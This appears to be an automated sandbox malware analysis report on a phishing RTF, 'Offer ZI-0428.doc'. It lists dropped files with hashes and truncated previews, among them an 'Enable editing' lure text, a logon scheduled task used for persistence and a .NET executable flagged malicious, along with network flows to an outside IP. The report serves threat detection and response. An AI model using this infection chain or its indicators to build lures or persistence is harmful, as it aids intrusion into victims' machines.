                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:CE338FE6899778AACFC28414F2D9498B
                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1536
                        Entropy (8bit):1.3586208805849453
                        Encrypted:false
                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb7:IiiiiiiiiifdLloZQc8++lsJe1MzM
                        MD5:24B73117D7FC50947F82B8E1280385CA
                        SHA1:8F9CDF74F8889DFD9019C73F6E1BEDD61C115DFA
                        SHA-256:F78AB2175108174B9BBE4A8984007A6CEAE0689C8146D6A14882A7733A075BE4
                        SHA-512:5DE63A23EA17DA1DBE64F715B4D6C7C836A602F446F76918DCE6BEC85D378AD2620074085F4CC1858E8702C375DDACB3FF722F12533A9439EC3B7E10F518A026
                        Malicious:false
                        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):175616
                        Entropy (8bit):3.421465675373316
                        Encrypted:false
                        SSDEEP:3072:jyemryemryemryemryemryemryemryemryemryeme:jyemryemryemryemryemryemryemryeR
                        MD5:BC2C80DAA26F558C64A7799781EACC62
                        SHA1:A3EE9DD5888A82E1C50227545631989DBCA858DD
                        SHA-256:C5F4AC71D59D8923373DED6F933696956EC8F1DF532756A9B7DFC0AA91AD36BE
                        SHA-512:11F3ED194C5496E4C2BB68E04D76CF637DB864D7EDE13159510BBA3B699EC7449F9181ABBDA1216024148485063181D7388C5BB179C2D8C3C76CBABCFB4898F4
                        Malicious:false
                        Preview:3.1.6.4.2.4.6.7.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x00b00502, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1390562282693195
                        Encrypted:false
                        SSDEEP:24576:bO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:bOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:85A50A338DB39FAFE4D0635B2508F61B
                        SHA1:5356E89C810B1A66B2EAAE98CA8E432C8BB62C67
                        SHA-256:54C21215A1BD250FBB3880A516275771A96A45D01CFE1672BA308F514B501F7F
                        SHA-512:0F7C6AE30A56561386C297E9FD1D70F5C2102FB03520EDFA6F4CC65B9A6D85CACDB66DCD67BC03C4E764A80A379962286FBEFCEB96DC1C693321C0D24F855FBB
                        Malicious:false
                        Preview:....... ........................u..............................;:...{..::...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1577
                        Entropy (8bit):5.109987849101395
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtmxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTqv
                        MD5:C1E842B710AA83CA6DDDAE6327FE93F6
                        SHA1:E94B0E9263249D2C507268E09EB12FBC93A5786F
                        SHA-256:A4248378E1B208600EEDF5C2DADD6CE6B1EC5012DA9C37D0E14175A0871FDBDC
                        SHA-512:303B473FA469FC872CC9A46DF828FDB448D602FE7EEC0608ED4F51692CB7C035638B5F710F587158A273BE8793E015F582E074E1FC0431DD57B0A3162CE0BC5C
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1577
                        Entropy (8bit):5.109987849101395
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtmxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTqv
                        MD5:C1E842B710AA83CA6DDDAE6327FE93F6
                        SHA1:E94B0E9263249D2C507268E09EB12FBC93A5786F
                        SHA-256:A4248378E1B208600EEDF5C2DADD6CE6B1EC5012DA9C37D0E14175A0871FDBDC
                        SHA-512:303B473FA469FC872CC9A46DF828FDB448D602FE7EEC0608ED4F51692CB7C035638B5F710F587158A273BE8793E015F582E074E1FC0431DD57B0A3162CE0BC5C
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Mon Jul 1 10:57:56 2024, length=300804, window=hide
                        Category:dropped
                        Size (bytes):1029
                        Entropy (8bit):4.546351453929082
                        Encrypted:false
                        SSDEEP:12:8y4zQ3gXg/XAlCPCHaXFKBGbgB/qPX+WmOXsLQ4icvbhn64oL4DtZ3YilMMEpxRJ:8y4zS/XT1KQM4UxmecMDv3qEk7N
                        MD5:F4FAFD5D33CE07F62CB75BB96C779948
                        SHA1:FC1CF89926B41A1D1C40225D142F681A1B9348C4
                        SHA-256:25EAAAE64059952D59D3496CF13B4A5FAB9A2A701A31D58EE6751A841BE6925D
                        SHA-512:AE193E428EAD139F4C8E4E18E9B67942C3ED9FFD4407BF00B4F5E10A9CD945D3590713827E9FAC9F59D2F5570699546376EC4E0E80F2302A59B5B21F8CCDF31A
                        Malicious:false
                        Preview:L..................F.... .....k.r.....k.r....1D.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X:_..user.8......QK.X.X:_*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2......X=_ .OFFERZ~1.DOC..P.......WF..WF.*.........................O.f.f.e.r. .Z.I.-.0.4.2.8...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\992547\Users.user\Desktop\Offer ZI-0428.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.f.f.e.r. .Z.I.-.0.4.2.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......992547..........D_....3N...W...9.W.e8...8.....[D_....3
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [folders]
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.588233670962456
                        Encrypted:false
                        SSDEEP:3:M14DAVJulm4QcVJulv:MGDAVgicVg1
                        MD5:AA80BC6B1891EA3CFDD6E0F3081E13E3
                        SHA1:797395F81E78F658237C4A558178AFEC8AB3A9C5
                        SHA-256:CE38CABD7AE29945F42C3863A778B1FC505817A13E595D54451AE312C89608CF
                        SHA-512:7BFC3AC88B87C9401FEC9997969BE81203D8895E1AF2F615ACB384965710AF1A3AD3C044A7E09E56596472B5C2848AED902407F34E24062394366BBE00354495
                        Malicious:false
                        Preview:[doc]..Offer ZI-0428.LNK=0..[folders]..Offer ZI-0428.LNK=0..
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVygGlTJbyL0KllVMWpxi/NctOlln:vdsCkWthKKXxitl
                        MD5:23BAE74EC6AC87E5A629AAB97C6FED07
                        SHA1:A1EE321EAD9491E2401D3725985F7681DBC0EC5A
                        SHA-256:0C2909E4EE83AF17A6320F1DAB9F2D1BA5C4C001972DAB07C7F092B081564E9D
                        SHA-512:197A202D4AE7DD5D171CA60DBAA3E08492FF38200DF7DBF285BAA718D2E85D4533B99397D70D17BEFC5C87FE131AFD893970121032E24197D40AE19B0036FF43
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVygGlTJbyL0KllVMWpxi/NctOlln:vdsCkWthKKXxitl
                        MD5:23BAE74EC6AC87E5A629AAB97C6FED07
                        SHA1:A1EE321EAD9491E2401D3725985F7681DBC0EC5A
                        SHA-256:0C2909E4EE83AF17A6320F1DAB9F2D1BA5C4C001972DAB07C7F092B081564E9D
                        SHA-512:197A202D4AE7DD5D171CA60DBAA3E08492FF38200DF7DBF285BAA718D2E85D4533B99397D70D17BEFC5C87FE131AFD893970121032E24197D40AE19B0036FF43
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                        File type:Rich Text Format data, version 1
                        Entropy (8bit):3.646006732333623
                        TrID:
                        • Rich Text Format (5005/1) 55.56%
                        • Rich Text Format (4004/1) 44.44%
                        File name:Offer ZI-0428.doc
                        File size:300'804 bytes
                        MD5:dde9d7d091ac0cc1d35515d259d8ca6f
                        SHA1:c6e943143771fc3fd7c2c548f5fddcd6013d9302
                        SHA256:95be57795b850e5aa098c80a107bafdb581da7653d9b57b8f2d37b89880de224
                        SHA512:04f282c1b0333925454b7ab1c461c4ae395b0b8148bc6d51fd36368db2dc187daa6d273177d4ad15b50ede52bacf6271062dab70d45b871c8f805a8083844995
                        SSDEEP:6144:4GuqGuqGuqGuqGuqGuqGuqGuqGuqGu9tNcTr:4
                        TLSH:8954D26DD34B02598F620337AB571E5142BDBA6EF38552B1306C537933DAC3CA2252BE
                        File Content Preview:{\rtf1..{\*\kyK4YPbgZxNLzqWfwUOxZET5OPKboZs7z0l0wZ6EpZQVWAsiUngVozpCZL1xOqw9ELcxZIALbqk8w3lPLOKBrZwG7SRPwTFh8ynCZ7BoZoEUP2aWBKFIrVD5gnUFcxCaKxC07ZaQNVnr5flqebM7zL5QuM3jarDYTIjfMAlwgxMW7ShAOHYwObv4SB49zffOF3ISSS7A9Bnlgwn}..{\931642467please click Enable ed
                        Icon Hash:2764a3aaaeb7bdbf
                        Id:0
                        Start:00015E55h
                        Format ID:
                        Format:
                        Classname:
                        Datasize:
                        Filename:
                        Sourcepath:
                        Temppath:
                        Exploit:no
                        Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                        Jul 1, 2024 13:58:01.151169062 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.156018972 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.156196117 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.156550884 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.162249088 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770646095 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770714998 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770757914 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770792961 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770795107 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770795107 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770828009 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770863056 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770886898 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770899057 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770930052 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770944118 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770944118 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770962954 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.770982981 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.770999908 CEST  80           49164      31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:01.771027088 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.771064043 CEST  49164        80         192.168.2.22    31.192.235.145
                        Jul 1, 2024 13:58:01.775934935 CEST  80           49164      31.192.235.145  192.168.2.22
